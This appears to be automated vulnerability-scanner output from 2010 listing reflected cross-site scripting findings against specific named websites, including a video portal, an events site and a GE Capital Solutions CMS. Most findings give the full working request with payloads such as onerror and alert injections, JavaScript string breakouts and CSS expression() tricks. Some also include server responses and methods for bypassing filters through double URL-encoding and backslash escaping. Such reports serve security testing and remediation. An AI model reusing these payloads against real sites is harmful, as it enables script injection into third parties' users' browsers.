The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce035"><img%20src%3da%20onerror%3dalert(1)>f3a8bd32ff6 was submitted in the REST URL parameter 2. This input was echoed as ce035"><img src=a onerror=alert(1)>f3a8bd32ff6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedyce035"><img%20src%3da%20onerror%3dalert(1)>f3a8bd32ff6/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53e05<img%20src%3da%20onerror%3dalert(1)>f0cff34a331 was submitted in the REST URL parameter 2. This input was echoed as 53e05<img src=a onerror=alert(1)>f0cff34a331 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy53e05<img%20src%3da%20onerror%3dalert(1)>f0cff34a331/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7c99\'%3b78cf9b72472 was submitted in the REST URL parameter 2. This input was echoed as a7c99\\';78cf9b72472 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedya7c99\'%3b78cf9b72472/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedya7c99\\';78cf9b72472'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'Wheel of Fortune One-Letter Winner'; // modified by VIDEO APP this.sectionLevel5 = '';
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c28"><img%20src%3da%20onerror%3dalert(1)>fc172e16269 was submitted in the REST URL parameter 3. This input was echoed as 41c28"><img src=a onerror=alert(1)>fc172e16269 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopers41c28"><img%20src%3da%20onerror%3dalert(1)>fc172e16269/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57812"><img%20src%3da%20onerror%3dalert(1)>2ea1a00c9e5 was submitted in the REST URL parameter 2. This input was echoed as 57812"><img src=a onerror=alert(1)>2ea1a00c9e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy57812"><img%20src%3da%20onerror%3dalert(1)>2ea1a00c9e5/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5629f\'%3b8e67f8f3d69 was submitted in the REST URL parameter 2. This input was echoed as 5629f\\';8e67f8f3d69 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedy5629f\'%3b8e67f8f3d69/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedy5629f\\';8e67f8f3d69'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'Worst Family Feud Answer Ever'; // modified by VIDEO APP this.sectionLevel5 = ''; this ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbec2<img%20src%3da%20onerror%3dalert(1)>ae2a3cc57ed was submitted in the REST URL parameter 2. This input was echoed as bbec2<img src=a onerror=alert(1)>ae2a3cc57ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedybbec2<img%20src%3da%20onerror%3dalert(1)>ae2a3cc57ed/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f4a"><img%20src%3da%20onerror%3dalert(1)>2dd7f71493b was submitted in the REST URL parameter 3. This input was echoed as e7f4a"><img src=a onerror=alert(1)>2dd7f71493b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-blooperse7f4a"><img%20src%3da%20onerror%3dalert(1)>2dd7f71493b/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88aa0<script>alert(1)</script>012708f88c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /preferences88aa0<script>alert(1)</script>012708f88c4/ HTTP/1.1 Host: events.deloitte-canada.12hna.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 03:47:29 GMT Server: Apache Set-Cookie: PHPSESSID=cea7b33856f84f12c9787fe043eae1f6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent,Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /preferences88aa0<script>alert(1)</script>012708f88c4/ was not found on this server.<P> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27ea6"><img%20src%3da%20onerror%3dalert(1)>28bf2c88dc0 was submitted in the REST URL parameter 6. This input was echoed as 27ea6"><img src=a onerror=alert(1)>28bf2c88dc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en27ea6"><img%20src%3da%20onerror%3dalert(1)>28bf2c88dc0/about_us HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24d06"-alert(1)-"c79e5188c0f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06"-alert(1)-"c79e5188c0f/about_us HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:21 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=en24d06"-alert(1)-"c79e5188c0f; Expires=Fri, 25-Nov-2011 03:03:16 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:21 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17502 Connection: close
<!-- try /about_us --> <!-- found section -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae706"-alert(1)-"4d25068fe5a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/enae706"-alert(1)-"4d25068fe5a/about_us/contact.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:34 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=enae706"-alert(1)-"4d25068fe5a; Expires=Fri, 25-Nov-2011 03:03:29 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:34 GMT Content-Type: text/html;charset=utf-8 Content-Length: 24665 Connection: close
<!-- try /about_us --> <!-- found section -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a084"><img%20src%3da%20onerror%3dalert(1)>71aa38af2a was submitted in the REST URL parameter 6. This input was echoed as 5a084"><img src=a onerror=alert(1)>71aa38af2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en5a084"><img%20src%3da%20onerror%3dalert(1)>71aa38af2a/about_us/contact.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18b29"-alert(1)-"3781ed8f5f2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en18b29"-alert(1)-"3781ed8f5f2/about_us/privacy_policy.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:16 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=en18b29"-alert(1)-"3781ed8f5f2; Expires=Fri, 25-Nov-2011 03:03:05 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 26225 Connection: close
<!-- try /about_us --> <!-- found section -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4558"><img%20src%3da%20onerror%3dalert(1)>0a02bfb442d was submitted in the REST URL parameter 6. This input was echoed as a4558"><img src=a onerror=alert(1)>0a02bfb442d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ena4558"><img%20src%3da%20onerror%3dalert(1)>0a02bfb442d/about_us/terms.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f993"-alert(1)-"dfd6430fe33 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en5f993"-alert(1)-"dfd6430fe33/about_us/terms.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:41 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=en5f993"-alert(1)-"dfd6430fe33; Expires=Fri, 25-Nov-2011 03:03:36 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:41 GMT Content-Type: text/html;charset=utf-8 Content-Length: 42022 Connection: close
<!-- try /about_us --> <!-- found section -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3d8"><img%20src%3da%20onerror%3dalert(1)>c0d3b78b1ee was submitted in the REST URL parameter 6. This input was echoed as 6d3d8"><img src=a onerror=alert(1)>c0d3b78b1ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d3d8"><img%20src%3da%20onerror%3dalert(1)>c0d3b78b1ee/careers/index.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e287a"-alert(1)-"649b713b118 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ene287a"-alert(1)-"649b713b118/careers/index.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:59 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=ene287a"-alert(1)-"649b713b118; Expires=Fri, 25-Nov-2011 03:03:50 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:59 GMT Content-Type: text/html;charset=utf-8 Content-Length: 19056 Connection: close
<!-- try /careers --> <!-- found section -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6e86"><img%20src%3da%20onerror%3dalert(1)>c337dd7d8e3 was submitted in the REST URL parameter 6. This input was echoed as e6e86"><img src=a onerror=alert(1)>c337dd7d8e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ene6e86"><img%20src%3da%20onerror%3dalert(1)>c337dd7d8e3/industries HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0593"-alert(1)-"d78e5639b46 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ene0593"-alert(1)-"d78e5639b46/industries HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:40 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=ene0593"-alert(1)-"d78e5639b46; Expires=Fri, 25-Nov-2011 03:03:37 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:40 GMT Content-Type: text/html;charset=utf-8 Content-Length: 24961 Connection: close
<!-- try /industries --> <!-- found section -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b90"-alert(1)-"ced45cc14f9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en10b90"-alert(1)-"ced45cc14f9/technology_finance/tech_pages/index.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:03 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=en10b90"-alert(1)-"ced45cc14f9; Expires=Fri, 25-Nov-2011 03:03:02 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:03 GMT Content-Type: text/html;charset=utf-8 Content-Length: 13440 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en10b90"-alert(1)-"ced45cc14f9/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 910e0%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e8e851e91124 was submitted in the REST URL parameter 6. This input was echoed as 910e0"><x style=x:expression(alert(1))>8e851e91124 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en910e0%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e8e851e91124/technology_finance/tech_pages/index.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:02:52 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=en910e0"><x style=x:expression(alert(1))>8e851e91124; Expires=Fri, 25-Nov-2011 03:02:46 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:02:52 GMT Content-Type: text/html;charset=utf-8 Content-Length: 14232 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en910e0"><x style=x:expression(alert(1))>8e851e91124/technology_finance/tech_pages/index.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d64c"><x%20style%3dx%3aexpression(alert(1))>1019ecc4962 was submitted in the REST URL parameter 6. This input was echoed as 6d64c"><x style=x:expression(alert(1))>1019ecc4962 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d64c"><x%20style%3dx%3aexpression(alert(1))>1019ecc4962/technology_finance/tech_pages/techadvise.html HTTP/1.1 Host: gecapsol.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d64c"><x style=x:expression(alert(1))>1019ecc4962/technology_finance/tech_pages/techadvise.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46bb7%2522%252dalert%25281%2529%252d%2522fe1fe929661 was submitted in the REST URL parameter 6. This input was echoed as 46bb7"-alert(1)-"fe1fe929661 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en46bb7%2522%252dalert%25281%2529%252d%2522fe1fe929661/technology_finance/tech_pages/techadvise.html HTTP/1.1 Host: gecapsol.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en46bb7"-alert(1)-"fe1fe929661/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d750%2522%253e%253ca%253eac006d1ba9c was submitted in the REST URL parameter 6. This input was echoed as 6d750"><a>ac006d1ba9c in the application's response.
